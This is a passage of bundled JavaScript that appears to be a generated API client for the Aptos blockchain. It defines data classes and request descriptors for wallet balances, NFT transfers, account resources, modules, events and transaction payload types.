            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$22d037061c23d6e3 = /** @class */ function() {
    function AptosHistoricalCoinBalanceDto(input) {
        this.amount = $a7ef34a427d74c9c$export$5d1e9aab577c748d.create(input.amount);
        this.coinType = input.coinType;
        this.coinTypeHash = input.coinTypeHash;
        this.transactionTimestamp = input.transactionTimestamp;
        this.transactionVersion = input.transactionVersion;
        this.ownerAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.ownerAddress);
    }
    AptosHistoricalCoinBalanceDto.create = function(input) {
        if (input instanceof AptosHistoricalCoinBalanceDto) return input;
        return new AptosHistoricalCoinBalanceDto(input);
    };
    AptosHistoricalCoinBalanceDto.fromJSON = function(json) {
        var input = {
            amount: $a7ef34a427d74c9c$export$5d1e9aab577c748d.fromJSON(json.amount),
            coinType: json.coin_type,
            coinTypeHash: json.coin_type_hash,
            transactionTimestamp: json.transaction_timestamp,
            transactionVersion: json.transaction_version,
            ownerAddress: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.owner_address)
        };
        return AptosHistoricalCoinBalanceDto.create(input);
    };
    AptosHistoricalCoinBalanceDto.prototype.toJSON = function() {
        return {
            amount: this.amount.toJSON(),
            coin_type: this.coinType,
            coin_type_hash: this.coinTypeHash,
            transaction_timestamp: this.transactionTimestamp,
            transaction_version: this.transactionVersion,
            owner_address: this.ownerAddress.toJSON()
        };
    };
    return AptosHistoricalCoinBalanceDto;
}();
var $a7ef34a427d74c9c$export$97a96364ef6460d9 = /** @class */ function() {
    function AptosGetHistoricalCoinBalancesByWalletsResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$22d037061c23d6e3.create(item);
        });
    }
    AptosGetHistoricalCoinBalancesByWalletsResponse.create = function(input) {
        if (input instanceof AptosGetHistoricalCoinBalancesByWalletsResponse) return input;
        return new AptosGetHistoricalCoinBalancesByWalletsResponse(input);
    };
    AptosGetHistoricalCoinBalancesByWalletsResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$22d037061c23d6e3.fromJSON(item);
            })
        };
        return AptosGetHistoricalCoinBalancesByWalletsResponse.create(input);
    };
    AptosGetHistoricalCoinBalancesByWalletsResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetHistoricalCoinBalancesByWalletsResponse;
}();
var $a7ef34a427d74c9c$export$7b929e860376a92f = {
    operationId: "getHistoricalCoinBalancesByWallets",
    groupName: "wallets",
    httpMethod: "get",
    routePattern: "/wallets/coins/history",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "owner_addresses",
        "coin_type_hash_blacklist",
        "coin_type_hash_whitelist",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$97a96364ef6460d9.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var ownerAddresses = request.ownerAddresses.map(function(item) {
            return $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(item);
        });
        var coinTypeHashBlacklist = request.coinTypeHashBlacklist;
        var coinTypeHashWhitelist = request.coinTypeHashWhitelist;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            owner_addresses: ownerAddresses.map(function(item) {
                return item.toJSON();
            }),
            coin_type_hash_blacklist: coinTypeHashBlacklist,
            coin_type_hash_whitelist: coinTypeHashWhitelist,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$c8696df2bb89968 = {
    operationId: "getCoinTransfersByWalletAddresses",
    groupName: "wallets",
    httpMethod: "get",
    routePattern: "/wallets/coins/transfers",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "owner_addresses",
        "from_date",
        "to_date",
        "coin_type_blacklist",
        "coin_type_whitelist",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$cc05bc4da8f83941.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var ownerAddresses = request.ownerAddresses.map(function(item) {
            return $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(item);
        });
        var fromDate = request.fromDate;
        var toDate = request.toDate;
        var coinTypeBlacklist = request.coinTypeBlacklist;
        var coinTypeWhitelist = request.coinTypeWhitelist;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            owner_addresses: ownerAddresses.map(function(item) {
                return item.toJSON();
            }),
            from_date: fromDate,
            to_date: toDate,
            coin_type_blacklist: coinTypeBlacklist,
            coin_type_whitelist: coinTypeWhitelist,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$3a26f63b56e1b95b = /** @class */ function() {
    function AptosNFTsByOwnersResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$26cb313ae2b9c3df.create(item);
        });
    }
    AptosNFTsByOwnersResponse.create = function(input) {
        if (input instanceof AptosNFTsByOwnersResponse) return input;
        return new AptosNFTsByOwnersResponse(input);
    };
    AptosNFTsByOwnersResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$26cb313ae2b9c3df.fromJSON(item);
            })
        };
        return AptosNFTsByOwnersResponse.create(input);
    };
    AptosNFTsByOwnersResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosNFTsByOwnersResponse;
}();
var $a7ef34a427d74c9c$export$ad93948450dc00f2 = {
    operationId: "getNFTByOwners",
    groupName: "wallets",
    httpMethod: "get",
    routePattern: "/wallets/nfts",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "owner_addresses",
        "collection_blacklist",
        "collection_whitelist",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$3a26f63b56e1b95b.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var ownerAddresses = request.ownerAddresses.map(function(item) {
            return $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(item);
        });
        var collectionBlacklist = request.collectionBlacklist;
        var collectionWhitelist = request.collectionWhitelist;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            owner_addresses: ownerAddresses.map(function(item) {
                return item.toJSON();
            }),
            collection_blacklist: collectionBlacklist,
            collection_whitelist: collectionWhitelist,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$ad0a47efda62f79d = {
    operationId: "getWalletsNFTTransfers",
    groupName: "wallets",
    httpMethod: "get",
    routePattern: "/wallets/nfts/transfers",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "wallet_addresses",
        "collection_blacklist",
        "collection_whitelist",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$42654a34bb677c53.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var walletAddresses = request.walletAddresses.map(function(item) {
            return $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(item);
        });
        var collectionBlacklist = request.collectionBlacklist;
        var collectionWhitelist = request.collectionWhitelist;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            wallet_addresses: walletAddresses.map(function(item) {
                return item.toJSON();
            }),
            collection_blacklist: collectionBlacklist,
            collection_whitelist: collectionWhitelist,
            network: network ? network.toJSON() : undefined
        };
    }
};
// $ref: #/components/schemas/GetAccountResponse
// type: GetAccountResponse
// properties:
// - sequence_number ($ref: #/components/schemas/GetAccountResponse/properties/sequence_number)
// - authentication_key ($ref: #/components/schemas/GetAccountResponse/properties/authentication_key)
var $a7ef34a427d74c9c$export$ecf39db1549dfef7 = /** @class */ function() {
    function AptosGetAccountResponse(input) {
        this.sequenceNumber = input.sequenceNumber;
        this.authenticationKey = input.authenticationKey;
    }
    AptosGetAccountResponse.create = function(input) {
        if (input instanceof AptosGetAccountResponse) return input;
        return new AptosGetAccountResponse(input);
    };
    AptosGetAccountResponse.fromJSON = function(json) {
        var input = {
            sequenceNumber: json.sequence_number,
            authenticationKey: json.authentication_key
        };
        return AptosGetAccountResponse.create(input);
    };
    AptosGetAccountResponse.prototype.toJSON = function() {
        return {
            sequence_number: this.sequenceNumber,
            authentication_key: this.authenticationKey
        };
    };
    return AptosGetAccountResponse;
}();
var $a7ef34a427d74c9c$export$944ab138a16c620e = {
    operationId: "getAccount",
    groupName: "accounts",
    httpMethod: "get",
    routePattern: "/accounts/{address}",
    parameterNames: [
        "address",
        "ledger_version",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$ecf39db1549dfef7.fromJSON(json);
    },
    serializeRequest: function(request) {
        var address = request.address;
        var ledgerVersion = request.ledgerVersion;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            address: address,
            ledger_version: ledgerVersion,
            network: network ? network.toJSON() : undefined
        };
    }
};
// $ref: #/components/schemas/GetAccountResourceResponse/properties/data
// typeName: GetAccountResourceResponse_data
var $a7ef34a427d74c9c$export$6fcdf4b24b6a271d = /** @class */ function() {
    function AptosGetAccountResourceResponseData() {}
    AptosGetAccountResourceResponseData.create = function(input) {
        return input;
    };
    AptosGetAccountResourceResponseData.fromJSON = function(json) {
        return json;
    };
    return AptosGetAccountResourceResponseData;
}();
var $a7ef34a427d74c9c$export$dd7deb4e9310a63a = /** @class */ function() {
    function AptosGetAccountResourceResponse(input) {
        this.type = input.type;
        this.data = $a7ef34a427d74c9c$export$6fcdf4b24b6a271d.create(input.data);
    }
    AptosGetAccountResourceResponse.create = function(input) {
        if (input instanceof AptosGetAccountResourceResponse) return input;
        return new AptosGetAccountResourceResponse(input);
    };
    AptosGetAccountResourceResponse.fromJSON = function(json) {
        var input = {
            type: json.type,
            data: $a7ef34a427d74c9c$export$6fcdf4b24b6a271d.fromJSON(json.data)
        };
        return AptosGetAccountResourceResponse.create(input);
    };
    AptosGetAccountResourceResponse.prototype.toJSON = function() {
        return {
            type: this.type,
            data: this.data
        };
    };
    return AptosGetAccountResourceResponse;
}();
var $a7ef34a427d74c9c$export$2436dd23bd0aa97c = {
    operationId: "getAccountResources",
    groupName: "accounts",
    httpMethod: "get",
    routePattern: "/accounts/{address}/resources",
    parameterNames: [
        "address",
        "ledger_version",
        "limit",
        "start",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $a7ef34a427d74c9c$export$dd7deb4e9310a63a.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        var address = request.address;
        var ledgerVersion = request.ledgerVersion;
        var limit = request.limit;
        var start = request.start;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            address: address,
            ledger_version: ledgerVersion,
            limit: limit,
            start: start,
            network: network ? network.toJSON() : undefined
        };
    }
};
// $ref: #/components/schemas/GenericTypeParam
// type: GenericTypeParam
// properties:
// - constraints ($ref: #/components/schemas/GenericTypeParam/properties/constraints)
var $a7ef34a427d74c9c$export$52470144fc6e01fa = /** @class */ function() {
    function AptosGenericTypeParam(input) {
        this.constraints = input.constraints;
    }
    AptosGenericTypeParam.create = function(input) {
        if (input instanceof AptosGenericTypeParam) return input;
        return new AptosGenericTypeParam(input);
    };
    AptosGenericTypeParam.fromJSON = function(json) {
        var input = {
            constraints: json.constraints
        };
        return AptosGenericTypeParam.create(input);
    };
    AptosGenericTypeParam.prototype.toJSON = function() {
        return {
            constraints: this.constraints
        };
    };
    return AptosGenericTypeParam;
}();
var $a7ef34a427d74c9c$export$2153e8ffeb9e1cfc = /** @class */ function() {
    function AptosModuleExposedFunction(input) {
        this.name = input.name;
        this.visibility = input.visibility;
        this.isEntry = input.isEntry;
        this.genericTypeParams = input.genericTypeParams.map(function(item) {
            return $a7ef34a427d74c9c$export$52470144fc6e01fa.create(item);
        });
        this.params = input.params;
        this.return = input.return;
    }
    AptosModuleExposedFunction.create = function(input) {
        if (input instanceof AptosModuleExposedFunction) return input;
        return new AptosModuleExposedFunction(input);
    };
    AptosModuleExposedFunction.fromJSON = function(json) {
        var input = {
            name: json.name,
            visibility: json.visibility,
            isEntry: json.is_entry,
            genericTypeParams: json.generic_type_params.map(function(item) {
                return $a7ef34a427d74c9c$export$52470144fc6e01fa.fromJSON(item);
            }),
            params: json.params,
            return: json.return
        };
        return AptosModuleExposedFunction.create(input);
    };
    AptosModuleExposedFunction.prototype.toJSON = function() {
        return {
            name: this.name,
            visibility: this.visibility,
            is_entry: this.isEntry,
            generic_type_params: this.genericTypeParams.map(function(item) {
                return item.toJSON();
            }),
            params: this.params,
            return: this.return
        };
    };
    return AptosModuleExposedFunction;
}();
// $ref: #/components/schemas/ModuleStructField
// type: ModuleStructField
// properties:
// - name ($ref: #/components/schemas/ModuleStructField/properties/name)
// - type ($ref: #/components/schemas/ModuleStructField/properties/type)
var $a7ef34a427d74c9c$export$16d12de8221f0f4a = /** @class */ function() {
    function AptosModuleStructField(input) {
        this.name = input.name;
        this.type = input.type;
    }
    AptosModuleStructField.create = function(input) {
        if (input instanceof AptosModuleStructField) return input;
        return new AptosModuleStructField(input);
    };
    AptosModuleStructField.fromJSON = function(json) {
        var input = {
            name: json.name,
            type: json.type
        };
        return AptosModuleStructField.create(input);
    };
    AptosModuleStructField.prototype.toJSON = function() {
        return {
            name: this.name,
            type: this.type
        };
    };
    return AptosModuleStructField;
}();
var $a7ef34a427d74c9c$export$ac9535dfcf30ae37 = /** @class */ function() {
    function AptosModuleStruct(input) {
        this.name = input.name;
        this.isNative = input.isNative;
        this.abilities = input.abilities;
        this.genericTypeParams = input.genericTypeParams.map(function(item) {
            return $a7ef34a427d74c9c$export$52470144fc6e01fa.create(item);
        });
        this.fields = input.fields.map(function(item) {
            return $a7ef34a427d74c9c$export$16d12de8221f0f4a.create(item);
        });
    }
    AptosModuleStruct.create = function(input) {
        if (input instanceof AptosModuleStruct) return input;
        return new AptosModuleStruct(input);
    };
    AptosModuleStruct.fromJSON = function(json) {
        var input = {
            name: json.name,
            isNative: json.is_native,
            abilities: json.abilities,
            genericTypeParams: json.generic_type_params.map(function(item) {
                return $a7ef34a427d74c9c$export$52470144fc6e01fa.fromJSON(item);
            }),
            fields: json.fields.map(function(item) {
                return $a7ef34a427d74c9c$export$16d12de8221f0f4a.fromJSON(item);
            })
        };
        return AptosModuleStruct.create(input);
    };
    AptosModuleStruct.prototype.toJSON = function() {
        return {
            name: this.name,
            is_native: this.isNative,
            abilities: this.abilities,
            generic_type_params: this.genericTypeParams.map(function(item) {
                return item.toJSON();
            }),
            fields: this.fields.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosModuleStruct;
}();
var $a7ef34a427d74c9c$export$cd39ab3ff7ff52cf = /** @class */ function() {
    function AptosMoveModuleAbi(input) {
        this.address = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.address);
        this.name = input.name;
        this.friends = input.friends;
        this.exposedFunctions = input.exposedFunctions.map(function(item) {
            return $a7ef34a427d74c9c$export$2153e8ffeb9e1cfc.create(item);
        });
        this.structs = input.structs.map(function(item) {
            return $a7ef34a427d74c9c$export$ac9535dfcf30ae37.create(item);
        });
    }
    AptosMoveModuleAbi.create = function(input) {
        if (input instanceof AptosMoveModuleAbi) return input;
        return new AptosMoveModuleAbi(input);
    };
    AptosMoveModuleAbi.fromJSON = function(json) {
        var input = {
            address: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.address),
            name: json.name,
            friends: json.friends,
            exposedFunctions: json.exposed_functions.map(function(item) {
                return $a7ef34a427d74c9c$export$2153e8ffeb9e1cfc.fromJSON(item);
            }),
            structs: json.structs.map(function(item) {
                return $a7ef34a427d74c9c$export$ac9535dfcf30ae37.fromJSON(item);
            })
        };
        return AptosMoveModuleAbi.create(input);
    };
    AptosMoveModuleAbi.prototype.toJSON = function() {
        return {
            address: this.address.toJSON(),
            name: this.name,
            friends: this.friends,
            exposed_functions: this.exposedFunctions.map(function(item) {
                return item.toJSON();
            }),
            structs: this.structs.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosMoveModuleAbi;
}();
var $a7ef34a427d74c9c$export$83f48a6edf4f4b8b = /** @class */ function() {
    function AptosGetAccountModuleResponse(input) {
        this.bytecode = input.bytecode;
        this.abi = $a7ef34a427d74c9c$export$cd39ab3ff7ff52cf.create(input.abi);
    }
    AptosGetAccountModuleResponse.create = function(input) {
        if (input instanceof AptosGetAccountModuleResponse) return input;
        return new AptosGetAccountModuleResponse(input);
    };
    AptosGetAccountModuleResponse.fromJSON = function(json) {
        var input = {
            bytecode: json.bytecode,
            abi: $a7ef34a427d74c9c$export$cd39ab3ff7ff52cf.fromJSON(json.abi)
        };
        return AptosGetAccountModuleResponse.create(input);
    };
    AptosGetAccountModuleResponse.prototype.toJSON = function() {
        return {
            bytecode: this.bytecode,
            abi: this.abi.toJSON()
        };
    };
    return AptosGetAccountModuleResponse;
}();
var $a7ef34a427d74c9c$export$d2d2cd6e70dfe394 = {
    operationId: "getAccountModules",
    groupName: "accounts",
    httpMethod: "get",
    routePattern: "/accounts/{address}/modules",
    parameterNames: [
        "address",
        "ledger_version",
        "limit",
        "start",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $a7ef34a427d74c9c$export$83f48a6edf4f4b8b.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        var address = request.address;
        var ledgerVersion = request.ledgerVersion;
        var limit = request.limit;
        var start = request.start;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            address: address,
            ledger_version: ledgerVersion,
            limit: limit,
            start: start,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$9727ea9b7f41a19 = {
    operationId: "getAccountResource",
    groupName: "accounts",
    httpMethod: "get",
    routePattern: "/accounts/{address}/resource/{resource_type}",
    parameterNames: [
        "address",
        "resource_type",
        "ledger_version",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$dd7deb4e9310a63a.fromJSON(json);
    },
    serializeRequest: function(request) {
        var address = request.address;
        var resourceType = request.resourceType;
        var ledgerVersion = request.ledgerVersion;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            address: address,
            resource_type: resourceType,
            ledger_version: ledgerVersion,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$7fe2a082bcb32be2 = {
    operationId: "getAccountModule",
    groupName: "accounts",
    httpMethod: "get",
    routePattern: "/accounts/{address}/resource/{module_name}",
    parameterNames: [
        "address",
        "module_name",
        "ledger_version",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$83f48a6edf4f4b8b.fromJSON(json);
    },
    serializeRequest: function(request) {
        var address = request.address;
        var moduleName = request.moduleName;
        var ledgerVersion = request.ledgerVersion;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            address: address,
            module_name: moduleName,
            ledger_version: ledgerVersion,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$5b391ee68ef91d8e = /** @class */ function() {
    function AptosTransactionEventGuid(input) {
        this.creationNumber = input.creationNumber;
        this.accountAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.accountAddress);
    }
    AptosTransactionEventGuid.create = function(input) {
        if (input instanceof AptosTransactionEventGuid) return input;
        return new AptosTransactionEventGuid(input);
    };
    AptosTransactionEventGuid.fromJSON = function(json) {
        var input = {
            creationNumber: json.creation_number,
            accountAddress: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.account_address)
        };
        return AptosTransactionEventGuid.create(input);
    };
    AptosTransactionEventGuid.prototype.toJSON = function() {
        return {
            creation_number: this.creationNumber,
            account_address: this.accountAddress.toJSON()
        };
    };
    return AptosTransactionEventGuid;
}();
// $ref: #/components/schemas/GetEventsByCreationNumberResponse/properties/data
// typeName: GetEventsByCreationNumberResponse_data
var $a7ef34a427d74c9c$export$8bdf075030244536 = /** @class */ function() {
    function AptosGetEventsByCreationNumberResponseData() {}
    AptosGetEventsByCreationNumberResponseData.create = function(input) {
        return input;
    };
    AptosGetEventsByCreationNumberResponseData.fromJSON = function(json) {
        return json;
    };
    return AptosGetEventsByCreationNumberResponseData;
}();
var $a7ef34a427d74c9c$export$c002d7a980064de9 = /** @class */ function() {
    function AptosGetEventsByCreationNumberResponse(input) {
        this.version = input.version;
        this.guid = $a7ef34a427d74c9c$export$5b391ee68ef91d8e.create(input.guid);
        this.sequenceNumber = input.sequenceNumber;
        this.type = input.type;
        this.data = $a7ef34a427d74c9c$export$8bdf075030244536.create(input.data);
    }
    AptosGetEventsByCreationNumberResponse.create = function(input) {
        if (input instanceof AptosGetEventsByCreationNumberResponse) return input;
        return new AptosGetEventsByCreationNumberResponse(input);
    };
    AptosGetEventsByCreationNumberResponse.fromJSON = function(json) {
        var input = {
            version: json.version,
            guid: $a7ef34a427d74c9c$export$5b391ee68ef91d8e.fromJSON(json.guid),
            sequenceNumber: json.sequence_number,
            type: json.type,
            data: $a7ef34a427d74c9c$export$8bdf075030244536.fromJSON(json.data)
        };
        return AptosGetEventsByCreationNumberResponse.create(input);
    };
    AptosGetEventsByCreationNumberResponse.prototype.toJSON = function() {
        return {
            version: this.version,
            guid: this.guid.toJSON(),
            sequence_number: this.sequenceNumber,
            type: this.type,
            data: this.data
        };
    };
    return AptosGetEventsByCreationNumberResponse;
}();
var $a7ef34a427d74c9c$export$5af241b06a37f277 = {
    operationId: "getEventsByCreationNumber",
    groupName: "accounts",
    httpMethod: "get",
    routePattern: "/accounts/{address}/events/{creation_number}",
    parameterNames: [
        "address",
        "creation_number",
        "limit",
        "start",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $a7ef34a427d74c9c$export$c002d7a980064de9.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        var address = request.address;
        var creationNumber = request.creationNumber;
        var limit = request.limit;
        var start = request.start;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            address: address,
            creation_number: creationNumber,
            limit: limit,
            start: start,
            network: network ? network.toJSON() : undefined
        };
    }
};
// $ref: #/components/schemas/GetEventsByEventHandleResponse/properties/data
// typeName: GetEventsByEventHandleResponse_data
var $a7ef34a427d74c9c$export$6af0666ef79625ba = /** @class */ function() {
    function AptosGetEventsByEventHandleResponseData() {}
    AptosGetEventsByEventHandleResponseData.create = function(input) {
        return input;
    };
    AptosGetEventsByEventHandleResponseData.fromJSON = function(json) {
        return json;
    };
    return AptosGetEventsByEventHandleResponseData;
}();
var $a7ef34a427d74c9c$export$a76314daac692986 = /** @class */ function() {
    function AptosGetEventsByEventHandleResponse(input) {
        this.version = input.version;
        this.guid = $a7ef34a427d74c9c$export$5b391ee68ef91d8e.create(input.guid);
        this.sequenceNumber = input.sequenceNumber;
        this.type = input.type;
        this.data = $a7ef34a427d74c9c$export$6af0666ef79625ba.create(input.data);
    }
    AptosGetEventsByEventHandleResponse.create = function(input) {
        if (input instanceof AptosGetEventsByEventHandleResponse) return input;
        return new AptosGetEventsByEventHandleResponse(input);
    };
    AptosGetEventsByEventHandleResponse.fromJSON = function(json) {
        var input = {
            version: json.version,
            guid: $a7ef34a427d74c9c$export$5b391ee68ef91d8e.fromJSON(json.guid),
            sequenceNumber: json.sequence_number,
            type: json.type,
            data: $a7ef34a427d74c9c$export$6af0666ef79625ba.fromJSON(json.data)
        };
        return AptosGetEventsByEventHandleResponse.create(input);
    };
    AptosGetEventsByEventHandleResponse.prototype.toJSON = function() {
        return {
            version: this.version,
            guid: this.guid.toJSON(),
            sequence_number: this.sequenceNumber,
            type: this.type,
            data: this.data
        };
    };
    return AptosGetEventsByEventHandleResponse;
}();
var $a7ef34a427d74c9c$export$50d5ae96d62a00f7 = {
    operationId: "getEventsByEventHandle",
    groupName: "accounts",
    httpMethod: "get",
    routePattern: "/accounts/{address}/events/{event_handle}/{field_name}",
    parameterNames: [
        "address",
        "event_handle",
        "field_name",
        "limit",
        "start",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $a7ef34a427d74c9c$export$a76314daac692986.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        var address = request.address;
        var eventHandle = request.eventHandle;
        var fieldName = request.fieldName;
        var limit = request.limit;
        var start = request.start;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            address: address,
            event_handle: eventHandle,
            field_name: fieldName,
            limit: limit,
            start: start,
            network: network ? network.toJSON() : undefined
        };
    }
};
// $ref: #/components/schemas/EntryFunctionPayloadRequest
// type: EntryFunctionPayloadRequest
// properties:
// - type ($ref: #/components/schemas/EntryFunctionPayloadRequest/properties/type)
// - function ($ref: #/components/schemas/EntryFunctionPayloadRequest/properties/function)
// - type_arguments ($ref: #/components/schemas/EntryFunctionPayloadRequest/properties/type_arguments)
// - arguments ($ref: #/components/schemas/EntryFunctionPayloadRequest/properties/arguments)
var $a7ef34a427d74c9c$export$32947f115b4ccda8 = /** @class */ function() {
    function AptosEntryFunctionPayloadRequest(input) {
        this.type = input.type;
        this.function = input.function;
        this.typeArguments = input.typeArguments;
        this.arguments = input.arguments;
    }
    AptosEntryFunctionPayloadRequest.create = function(input) {
        if (input instanceof AptosEntryFunctionPayloadRequest) return input;
        return new AptosEntryFunctionPayloadRequest(input);
    };
    AptosEntryFunctionPayloadRequest.fromJSON = function(json) {
        var input = {
            type: json.type,
            function: json.function,
            typeArguments: json.type_arguments,
            arguments: json.arguments
        };
        return AptosEntryFunctionPayloadRequest.create(input);
    };
    AptosEntryFunctionPayloadRequest.isInput = function(input) {
        return [
            "type",
            "function",
            "typeArguments",
            "arguments"
        ].every(function(name) {
            return input[name] !== undefined;
        });
    };
    AptosEntryFunctionPayloadRequest.isJSON = function(json) {
        return [
            "type",
            "function",
            "type_arguments",
            "arguments"
        ].every(function(name) {
            return json[name] !== undefined;
        });
    };
    AptosEntryFunctionPayloadRequest.prototype.toJSON = function() {
        return {
            type: this.type,
            function: this.function,
            type_arguments: this.typeArguments,
            arguments: this.arguments
        };
    };
    return AptosEntryFunctionPayloadRequest;
}();
// $ref: #/components/schemas/ScriptPayloadRequest/properties/code
// typeName: ScriptPayloadRequest_code
var $a7ef34a427d74c9c$export$66f2fa6531bc5ff8 = /** @class */ function() {
    function AptosScriptPayloadRequestCode() {}
    AptosScriptPayloadRequestCode.create = function(input) {
        return input;
    };
    AptosScriptPayloadRequestCode.fromJSON = function(json) {
        return json;
    };
    return AptosScriptPayloadRequestCode;
}();
var $a7ef34a427d74c9c$export$6cc4df55a0d44e53 = /** @class */ function() {
    function AptosScriptPayloadRequest(input) {
        this.type = input.type;
        this.code = $a7ef34a427d74c9c$export$66f2fa6531bc5ff8.create(input.code);
        this.typeArguments = input.typeArguments;
        this.arguments = input.arguments;
    }
    AptosScriptPayloadRequest.create = function(input) {
        if (input instanceof AptosScriptPayloadRequest) return input;
        return new AptosScriptPayloadRequest(input);
    };
    AptosScriptPayloadRequest.fromJSON = function(json) {
        var input = {
            type: json.type,
            code: $a7ef34a427d74c9c$export$66f2fa6531bc5ff8.fromJSON(json.code),
            typeArguments: json.type_arguments,
            arguments: json.arguments
        };
        return AptosScriptPayloadRequest.create(input);
    };
    AptosScriptPayloadRequest.isInput = function(input) {
        return [
            "type",
            "code",
            "typeArguments",
            "arguments"
        ].every(function(name) {
            return input[name] !== undefined;
        });
    };
    AptosScriptPayloadRequest.isJSON = function(json) {
        return [
            "type",
            "code",
            "type_arguments",
            "arguments"
        ].every(function(name) {
            return json[name] !== undefined;
        });
    };
    AptosScriptPayloadRequest.prototype.toJSON = function() {
        return {
            type: this.type,
            code: this.code,
            type_arguments: this.typeArguments,
            arguments: this.arguments
        };
    };
    return AptosScriptPayloadRequest;
}();
// $ref: #/components/schemas/ModuleBundlePayloadRequest
// type: ModuleBundlePayloadRequest
// properties:
// - type ($ref: #/components/schemas/ModuleBundlePayloadRequest/properties/type)
// - modules ($ref: #/components/schemas/ModuleBundlePayloadRequest/properties/modules)
var $a7ef34a427d74c9c$export$f01b89b84789019c = /** @class */ function() {
    function AptosModuleBundlePayloadRequest(input) {
